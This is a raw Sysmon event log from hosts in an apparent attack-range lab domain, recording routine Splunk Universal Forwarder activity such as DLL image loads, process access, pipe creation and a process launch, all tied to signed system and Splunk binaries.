DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001605918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001605913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.777{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 
19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.776{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x80000000000000001094925Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:33.660{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D29DFBB0317DDF94A36D0117A6701E,SHA256=F8773C73B1E8A2A497539F28C845C665AA8A4C036E464EF790199302533C4900,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001605904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001605903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001605902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.237{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001605900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.121{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001605896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 
734700x80000000000000001605894Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x80000000000000001605884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 
734700x80000000000000001605883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 
734700x80000000000000001605879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605876Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft 
WindowsValid 734700x80000000000000001605875Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605874Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605873Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605872Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 
734700x80000000000000001605871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 